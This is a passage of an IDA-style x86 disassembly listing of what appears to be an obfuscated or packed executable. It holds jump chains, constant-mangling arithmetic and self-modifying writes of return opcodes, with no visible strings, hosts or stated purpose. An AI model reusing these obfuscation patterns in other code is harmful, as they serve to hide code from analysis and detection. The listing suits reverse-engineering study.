		jmp	loc_4422E6
; END OF FUNCTION CHUNK	FOR sub_45A2F9
; ---------------------------------------------------------------------------

loc_443EDB:				; CODE XREF: y2kk37jd:0045014Ej
		jmp	loc_443B39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4410D8

loc_443EE0:				; CODE XREF: sub_4410D8+Cj
		jmp	loc_4576D9
; END OF FUNCTION CHUNK	FOR sub_4410D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_443EE5:				; CODE XREF: sub_4448E2-494Cj
		jmp	loc_447965
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_443EEA:				; DATA XREF: sub_43F520o
		jo	loc_440FA6
		call	sub_457F0C
		push	offset sub_43D8F6
		jmp	locret_4505D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_443EFF:				; CODE XREF: sub_43B163:loc_4497F9j
		push	offset loc_4592F2
		jmp	loc_44F432
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_443F09:				; CODE XREF: sub_445226:loc_43F49Ej
		push	2C326386h
		pop	eax
		rol	eax, 7
		jnb	loc_44EFF6
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_443F18:				; CODE XREF: sub_44C304+5232j
		jmp	loc_45AA9F
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_443F1D:				; CODE XREF: sub_448DCA-1561j
		jmp	loc_442B3E
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
		rol	ebp, 1Fh
		jmp	loc_44EFEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_443F2A:				; CODE XREF: sub_443AA7+B222j
		jle	loc_457AC6
		xchg	edx, [edi]
		or	ecx, 9994DDF7h
		or	ecx, edx
		jmp	loc_4596E3
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_443F3F:				; CODE XREF: sub_45AAAA:loc_43E411j
					; sub_4514DE:loc_4494B4j ...
		jns	loc_4475C4
		cmp	dword ptr [ebp-4], 1
		jnz	loc_43C597

loc_443F4F:				; CODE XREF: sub_453867:loc_453C7Cj
		jmp	loc_44E7C9
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E049

loc_443F54:				; CODE XREF: sub_43E049+Ej
		xchg	ecx, [esp+0]
		call	sub_448C11
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_449133
		jmp	loc_445D3B
; END OF FUNCTION CHUNK	FOR sub_43E049
; ---------------------------------------------------------------------------

loc_443F6B:				; CODE XREF: y2kk37jd:00455ED3j
		cmp	esi, 56D1DFFDh
		jmp	loc_446060
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44615F

loc_443F76:				; CODE XREF: sub_44615F+F77Fj
					; sub_45C6ED-46F6j
		rol	eax, 4
		push	eax
		call	sub_4526B7
		retn
; END OF FUNCTION CHUNK	FOR sub_44615F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_443F80:				; CODE XREF: sub_453867-833j
		jmp	loc_446E43
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_443F85:				; CODE XREF: y2kk37jd:0043DE71j
		mov	ecx, [eax]
		mov	ebp, 2D857139h

loc_443F8C:				; CODE XREF: y2kk37jd:loc_43DE55j
		add	edx, 3E7D6249h
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_443431
		jmp	loc_44D829
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445083

loc_443FA1:				; CODE XREF: sub_445083:loc_449E11j
		rol	eax, 19h
		sub	eax, 886A3354h
		xor	eax, 9102420Dh
		xchg	eax, [esp+10h+var_10]
		jmp	loc_43C3AF
; END OF FUNCTION CHUNK	FOR sub_445083

; =============== S U B	R O U T	I N E =======================================



sub_443FB8	proc near		; DATA XREF: y2kk37jd:0044A100o
		lea	eax, sub_43EE8A
		mov	byte ptr [eax],	0C3h
		jmp	sub_43EE8A
sub_443FB8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE8A

loc_443FC6:				; CODE XREF: sub_43EE8Aj
		xchg	eax, [esp-4+arg_0]
		mov	edx, eax
		pop	eax
		mov	eax, [esp+0]
		push	eax
		jmp	loc_43C0CF
; END OF FUNCTION CHUNK	FOR sub_43EE8A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_443FD5:				; CODE XREF: sub_4429DD:loc_44188Dj
		pop	esi
		rol	esi, 18h
		add	esi, 0CBC8A4E1h
		mov	[esi], eax
		call	sub_4458CA

loc_443FE6:				; CODE XREF: y2kk37jd:loc_45AC46j
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-20h]
		mov	byte ptr [eax],	6Ch
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-20h]
		mov	byte ptr [eax],	0
		inc	dword ptr [ebp-1Ch]
		jmp	loc_44B008
; END OF FUNCTION CHUNK	FOR sub_4429DD

; =============== S U B	R O U T	I N E =======================================



sub_444000	proc near		; CODE XREF: y2kk37jd:004477DFj
					; y2kk37jd:00458063p

; FUNCTION CHUNK AT 00441611 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00451906 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C4D2 SIZE 00000022 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		cmp	al, 0A4h
		jz	loc_444615
		jmp	loc_451906
sub_444000	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4436C1

loc_444011:				; CODE XREF: sub_4436C1:loc_45965Cj
		cmp	byte ptr [eax],	0CFh

loc_444014:				; CODE XREF: y2kk37jd:loc_43CF72j
		jz	loc_452656
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0E9h
		jz	loc_452656

loc_444026:				; CODE XREF: sub_444DF4-91F9j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0EBh
		call	sub_4590D6
; END OF FUNCTION CHUNK	FOR sub_4436C1
; START	OF FUNCTION CHUNK FOR sub_445226

loc_444031:				; CODE XREF: sub_445226+11315j
		jmp	sub_456541
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		adc	eax, ecx
		rol	edx, 0Fh
		jmp	sub_45AAF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_444040:				; CODE XREF: sub_44C304:loc_43DB1Cj
		add	ebp, 48B47A8Fh
		jmp	loc_456EB2
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------

loc_44404B:				; CODE XREF: y2kk37jd:00440A15j
		pop	eax
		mov	eax, [esp]
		push	edx
		push	esi
		push	58F911D5h
		pop	esi
		jmp	loc_4589A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E07B

loc_44405C:				; CODE XREF: sub_43E07B+1A2BCj
		jz	loc_444615
		jmp	loc_43FC83
; END OF FUNCTION CHUNK	FOR sub_43E07B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_444067:				; CODE XREF: sub_449C4F-91AFj
		push	3D61669Dh
		pop	esi
		and	esi, 157D86DEh
		or	esi, 69FBB25Eh
		rol	esi, 0Ch
		xor	esi, 2EB0ED55h
		add	esi, ebp
		add	esi, 6A22F572h
		jmp	loc_4481C7
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FCA

loc_44408F:				; CODE XREF: sub_441FCA+Dj
		mov	esi, ebp
		pop	ebp
		rol	esi, 1Ah
		add	esi, 5DF1D8A3h
		push	offset sub_44447A
		jmp	sub_4515A3
; END OF FUNCTION CHUNK	FOR sub_441FCA
; ---------------------------------------------------------------------------

loc_4440A5:				; CODE XREF: y2kk37jd:00450DE4j
		jnz	loc_44598F

; =============== S U B	R O U T	I N E =======================================



sub_4440AB	proc near		; CODE XREF: sub_45136B+4855p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C322 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0043D083 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DB8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440990 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044267A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443BD3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004459DD SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00448350 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044AE57 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B537 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044CE9B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00452AE2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455F7E SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00456FD4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457A1B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00458426 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459EDF SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_452AE2
sub_4440AB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4440BA:				; CODE XREF: sub_4411C3+B06j
		jnz	loc_459522
		sbb	eax, 40DD6A9Bh

loc_4440C6:				; CODE XREF: y2kk37jd:004524FDj
		push	eax
		jmp	loc_454E5D
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_4440CC:				; CODE XREF: sub_43F75D-292Aj
					; sub_44113A:loc_43FBFFj ...
		jmp	loc_44089C
; ---------------------------------------------------------------------------

loc_4440D1:				; CODE XREF: sub_43F75D+237Bj
					; sub_44113A+98D4j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_4440D4:				; CODE XREF: sub_44DBF8+B193j
		jmp	loc_458FB4
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_4440D9:				; CODE XREF: sub_453583-945Fj
		jmp	loc_44B5B9
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------

loc_4440DE:				; CODE XREF: y2kk37jd:0044DFEFj
		xor	eax, 0C3609591h
		add	ecx, 0B7008B9Dh
		jmp	loc_443A17
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_4440EF:				; CODE XREF: sub_43F770+4CCAj
		jle	loc_44B709

loc_4440F5:				; CODE XREF: sub_43F770:loc_43B1F2j
					; sub_44107E:loc_44682Bj
		push	0
		push	ebx
		push	355AF8Dh
		pop	ebx
		xor	ebx, 0E64EE53Ch
		or	ebx, 57A9933h
		xor	ebx, 0E4414341h
		jmp	loc_448018
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_444115:				; CODE XREF: sub_455B08-E0E6j
		mov	eax, [ecx]
		jns	loc_43F431

loc_44411D:				; CODE XREF: sub_455B08:loc_4588D0j
		push	0FA57A8B2h
		pop	ecx
		jmp	loc_45C5FA
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454ED9

loc_444128:				; CODE XREF: sub_454ED9+12j
		xor	ebx, 2EDDB679h
		add	ebx, 14E81E4Ch
		xchg	ebx, [esp+4+var_4]
		jmp	loc_4596C4
; END OF FUNCTION CHUNK	FOR sub_454ED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F142

loc_44413C:				; CODE XREF: sub_44F142:loc_44AF7Fj
		xor	esi, 0B97E82CCh
		add	esi, 0B54B1D37h
		rol	esi, 6
		add	esi, 0C46FEFAFh
		jmp	loc_44FAC9
; END OF FUNCTION CHUNK	FOR sub_44F142
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_444156:				; CODE XREF: sub_445226:loc_445C98j
		add	eax, eax
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_44B589

loc_444158:				; CODE XREF: sub_44B589:loc_447EC1j
		cdq
		push	offset loc_4549EA
		jmp	nullsub_151
; END OF FUNCTION CHUNK	FOR sub_44B589
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_444163:				; CODE XREF: sub_442DDC:loc_43EAE7j
		jnz	loc_44739F
		sub	ecx, 0CC29B532h
		sbb	eax, 5D5066Ch
		jmp	loc_44739D
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------

loc_44417A:				; CODE XREF: y2kk37jd:00444AB3j
		or	ebp, 5254D203h

; =============== S U B	R O U T	I N E =======================================



sub_444180	proc near		; CODE XREF: sub_457A87+2644p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004419D4 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00442772 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004430B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454CAB SIZE 00000020 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	edx, ebp
		add	edx, 3A581511h
		mov	edx, [edx]
		jmp	loc_4430B5
sub_444180	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_444193:				; CODE XREF: y2kk37jd:loc_45AE2Fj
		retn
; ---------------------------------------------------------------------------

loc_444194:				; DATA XREF: sub_44EAA2:loc_43C1A9o
		xchg	ebx, [esp]
		mov	edi, eax
		xchg	edi, [esp]
		push	offset sub_43B1D6
		jmp	loc_43C3A2
; ---------------------------------------------------------------------------

loc_4441A6:				; CODE XREF: y2kk37jd:0045935Ej
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_4441A7:				; CODE XREF: sub_4429DD:loc_43F479j
		xor	eax, 14B87830h
		add	eax, 0FF4DF585h
		call	sub_44113A
		call	sub_44B7DB

loc_4441BD:				; CODE XREF: y2kk37jd:loc_449EA8j
		jnz	loc_44FAB1
		jmp	loc_448616
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
		mov	ds:dword_41E0C4, eax
		lea	eax, nullsub_257
		mov	byte ptr [eax],	0C3h
		jmp	loc_43BB23
; ---------------------------------------------------------------------------
		push	offset loc_4478D8
		jmp	loc_450625
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_4441E6:				; CODE XREF: sub_44D302+41B5j
		mov	[ebp-20h], eax
; END OF FUNCTION CHUNK	FOR sub_44D302
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_4441E9:				; CODE XREF: sub_44D302:loc_441114j
					; sub_451E9F-2CC2j ...
		jb	loc_4488DF
		test	byte ptr [ebp-8], 40h
		jz	loc_43EF77
		push	ebp
		jmp	loc_449396
; END OF FUNCTION CHUNK	FOR sub_451E9F

; =============== S U B	R O U T	I N E =======================================



sub_4441FF	proc near		; CODE XREF: sub_43C851:loc_4428F8j
					; sub_442A84+7FEDp

; FUNCTION CHUNK AT 0043F499 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453048 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045C18A SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_458681
		push	edi
		push	0FC68D72Eh
		pop	edi
		sub	edi, 275A9B50h
		or	edi, 3A316416h
		jmp	loc_453048
sub_4441FF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_444220:				; CODE XREF: y2kk37jd:loc_43FE67j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_444221:				; CODE XREF: sub_4458DD+874Ej
		jz	loc_443E47

loc_444227:				; CODE XREF: y2kk37jd:00452FC3j
		jmp	loc_453177
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		add	eax, 0CCB570BEh
		ja	loc_446591
		jmp	loc_443E47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459672

loc_44423D:				; CODE XREF: sub_459672:loc_45AE34j
		mov	ebp, ebx
		pop	ebx
		jmp	loc_4561DB
; END OF FUNCTION CHUNK	FOR sub_459672
; ---------------------------------------------------------------------------
		push	eax
		mov	eax, ebp
		jmp	loc_43D3CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_44424D:				; CODE XREF: sub_43F2F2+1C28Cj
		push	0CD61DEEBh
		pop	esi
		or	esi, 150DFDAFh
		sub	esi, 700C6A92h
		add	esi, 92E36537h
		jmp	loc_44A3A1
; END OF FUNCTION CHUNK	FOR sub_43F2F2

; =============== S U B	R O U T	I N E =======================================



sub_44426A	proc near		; CODE XREF: y2kk37jd:0044709Cj
					; sub_43F8B8:loc_44B130p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00445E58 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00458DC2 SIZE 00000010 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	edi, [esp-4+arg_0]
		push	ecx
		push	0C9B27780h
		pop	ecx
		and	ecx, 0AB4A0839h
		or	ecx, 0B9DAC37Ch
		jmp	loc_445E58
sub_44426A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_444289:				; CODE XREF: sub_445226:loc_43CDD9j
		mov	eax, [eax+18h]
		cmp	dword ptr [eax+10h], 0
		jz	nullsub_57
		jmp	loc_457C58
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_44429B:				; CODE XREF: y2kk37jd:loc_43CE75j
		rol	esi, 11h
		call	sub_4474A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_429. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4442A4:				; CODE XREF: y2kk37jd:00443E77j
		jmp	loc_4439D6
; ---------------------------------------------------------------------------

loc_4442A9:				; CODE XREF: y2kk37jd:0043DFC8j
		jmp	loc_44F345
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_64. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4459CC

loc_4442AF:				; CODE XREF: sub_4459CC+1j
		jmp	loc_4493EC
; END OF FUNCTION CHUNK	FOR sub_4459CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_4442B4:				; CODE XREF: sub_45136B:loc_43B5CBj
		add	eax, 0EBA45188h
		jmp	loc_45B72C
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------

loc_4442BF:				; CODE XREF: y2kk37jd:00456D16j
		jb	loc_44231A
		cmp	esi, 0A6168C16h
		jmp	loc_459D61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_4442D0:				; CODE XREF: sub_454D0F-19061j
		ror	eax, 12h
		push	edi
		mov	edi, esi
		xchg	edi, [esp+0]
		jmp	loc_446B16
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
		mov	eax, 19A5E09Eh
		push	edi
		push	27E13F33h
		pop	edi
		jmp	loc_455016
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_108. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C6B8

loc_4442F0:				; CODE XREF: sub_45C6B8+13j
		jmp	sub_43FDE6
; END OF FUNCTION CHUNK	FOR sub_45C6B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_4442F5:				; CODE XREF: sub_44AC89:loc_4563D6j
		jnz	sub_4401D6
		jmp	loc_456580
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_444300:				; CODE XREF: sub_457524:loc_4548F6j
		push	eax
		push	edi
		push	0A9BF9E42h
		pop	edi
		and	edi, 0A28D52FDh
		add	edi, 5FB6C98Ch
		xchg	edi, [esp+0Ch+var_C]
		jmp	loc_4542FD
; END OF FUNCTION CHUNK	FOR sub_457524
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_44431C:				; CODE XREF: sub_43DF1F:loc_43F51Bj
		call	sub_459A7D
		push	0F4F3DE4Fh
		pop	eax
		add	eax, 0EEEA100Dh
		test	eax, 80000000h
		jmp	loc_45175E
; END OF FUNCTION CHUNK	FOR sub_43DF1F

; =============== S U B	R O U T	I N E =======================================



sub_444338	proc near		; CODE XREF: y2kk37jd:00449083p
					; y2kk37jd:00452ADDj

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax

loc_44433C:				; CODE XREF: y2kk37jd:loc_455D87j
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_4415B8
		mov	eax, 0A5559D12h
		push	edi
		jmp	loc_447840
sub_444338	endp

; ---------------------------------------------------------------------------

loc_444350:				; CODE XREF: y2kk37jd:loc_4576D4j
		jz	loc_443726

loc_444356:				; CODE XREF: y2kk37jd:0043DF50j
		jmp	loc_4413BE
; ---------------------------------------------------------------------------
		db 0Fh
; ---------------------------------------------------------------------------
		mov	bh, [ebx+0Bh]
		add	[eax], eax
		mov	[ebp+0], eax
		jmp	sub_44362C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453849

loc_444369:				; CODE XREF: sub_453849:loc_4593A8j
		pop	ebx
		and	eax, 72787EA0h
		xor	eax, 600032F0h
		push	esi
		pushf
		push	5D61CD04h
		pop	esi
		sub	esi, 7FFA4FCAh
		jmp	loc_43BE87
; END OF FUNCTION CHUNK	FOR sub_453849
; ---------------------------------------------------------------------------
		mov	ecx, 582875BDh

; =============== S U B	R O U T	I N E =======================================



sub_44438E	proc near		; CODE XREF: sub_445568:loc_44DEC5j
					; sub_44884D+7EE0p

; FUNCTION CHUNK AT 00442DEE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443760 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451F0B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004561EA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045948B SIZE 00000012 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		jnz	loc_45948B
		lea	edx, [ebp-14h]
		call	sub_43C2D9

loc_4443A0:				; CODE XREF: sub_441F30-54ECj
		test	ebx, 10h
		jmp	loc_443760
sub_44438E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A961

loc_4443AB:				; CODE XREF: sub_45A961-44B3j
		push	0C5692898h

loc_4443B0:				; CODE XREF: sub_45A961:loc_44512Ej
		shr	eax, 1Eh

loc_4443B3:				; CODE XREF: y2kk37jd:loc_452DE9j
		jmp	loc_454151
; END OF FUNCTION CHUNK	FOR sub_45A961
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_4443B8:				; CODE XREF: sub_4599BE+1j
		mov	ebp, esp

loc_4443BA:				; CODE XREF: y2kk37jd:00442B02j
		push	ebp
		push	ecx
		pop	ebp
		jmp	loc_44577D
; END OF FUNCTION CHUNK	FOR sub_4599BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_4443C2:				; CODE XREF: sub_43E679:loc_44170Bj
		test	eax, 0E66B3211h
		jmp	loc_458532
; END OF FUNCTION CHUNK	FOR sub_43E679

; =============== S U B	R O U T	I N E =======================================



sub_4443CD	proc near		; CODE XREF: sub_44570Fp
					; y2kk37jd:0044A3CDj ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B899 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441CCE SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00446242 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044DC9A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044E4F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AE15 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045B063 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045BE75 SIZE 00000008 BYTES

		xchg	eax, [esp+0]
		mov	edx, eax
		pop	eax
		jno	loc_45BE75
		mov	eax, [esp-4+arg_0]
		push	edx
		push	eax
		jmp	loc_45AE15
sub_4443CD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45024B

loc_4443E3:				; CODE XREF: sub_45024B:loc_450262j
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp-1], al
		cmp	byte ptr [ebp-1], 0
		push	offset loc_45592B
		jmp	nullsub_98
; END OF FUNCTION CHUNK	FOR sub_45024B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4443F9:				; CODE XREF: sub_445226+8106j
		sub	ebx, 7DF2D3D6h
		mov	ecx, 0E362FBC1h
		jmp	loc_45A9FF
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AC4B

loc_444409:				; CODE XREF: sub_45AC4B:loc_43D9AAj
		push	offset sub_4580C5
		jmp	loc_446CAB
; END OF FUNCTION CHUNK	FOR sub_45AC4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D1BD

loc_444413:				; CODE XREF: sub_43D1BD:loc_440F39j
					; y2kk37jd:00440F51j
		add	eax, 0F6432758h
		xchg	eax, [esp+0]
		jmp	sub_449775
; END OF FUNCTION CHUNK	FOR sub_43D1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4497E8

loc_444421:				; CODE XREF: sub_4497E8:loc_457C4Ej
		pop	edi
		sub	edi, 12915427h
		push	offset loc_456448
		jmp	nullsub_226
; END OF FUNCTION CHUNK	FOR sub_4497E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_444432:				; CODE XREF: sub_43F770-F89j
		jl	loc_447204
		test	ebp, esi
		jmp	loc_4440EF
; END OF FUNCTION CHUNK	FOR sub_43F770
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_493. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_444440	proc near		; CODE XREF: sub_43C0B8+Ap

; FUNCTION CHUNK AT 0045AA36 SIZE 00000005 BYTES

		push	offset sub_44A6E9

loc_444445:				; CODE XREF: sub_43F8B8:loc_454035j
		jmp	loc_45AA36
sub_444440	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_44444A:				; CODE XREF: sub_44107E+C3F4j
		test	ecx, 0BC73498Eh
		jmp	loc_447E78
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C335

loc_444455:				; CODE XREF: sub_43C335:loc_43C346j
		mov	ebp, eax
		pop	eax
		push	0CBEB2DA0h
		pop	eax
		jmp	loc_45210F
; END OF FUNCTION CHUNK	FOR sub_43C335

; =============== S U B	R O U T	I N E =======================================



sub_444463	proc near		; DATA XREF: sub_45136B+7C94o

; FUNCTION CHUNK AT 0044154E SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00451575 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004561A6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045AFAA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045C08D SIZE 00000005 BYTES

		xchg	ebp, [esp+0]
		mov	eax, ebp
		pop	ebp
		or	eax, 0CBBDBBD9h
		test	eax, 400h
		jmp	loc_45C08D
sub_444463	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44447A	proc near		; DATA XREF: sub_441FCA+20D1o
		xchg	esi, [esp+0]
		jmp	sub_4460D0
sub_44447A	endp

; ---------------------------------------------------------------------------

loc_444482:				; CODE XREF: y2kk37jd:00454897j
		pop	edx
		mov	eax, [esp]
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_444486:				; CODE XREF: sub_4448E2:loc_44A801j
					; y2kk37jd:loc_45688Aj
		push	edx
		call	sub_449775
		mov	eax, 1F1D4A60h
		push	offset sub_450B10
		jmp	nullsub_422
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44449B:				; CODE XREF: sub_43F8B8:loc_44618Ej
					; DATA XREF: sub_44610D+E289o
		lea	eax, [ebp-70h]
		push	ebp
		mov	ebp, eax
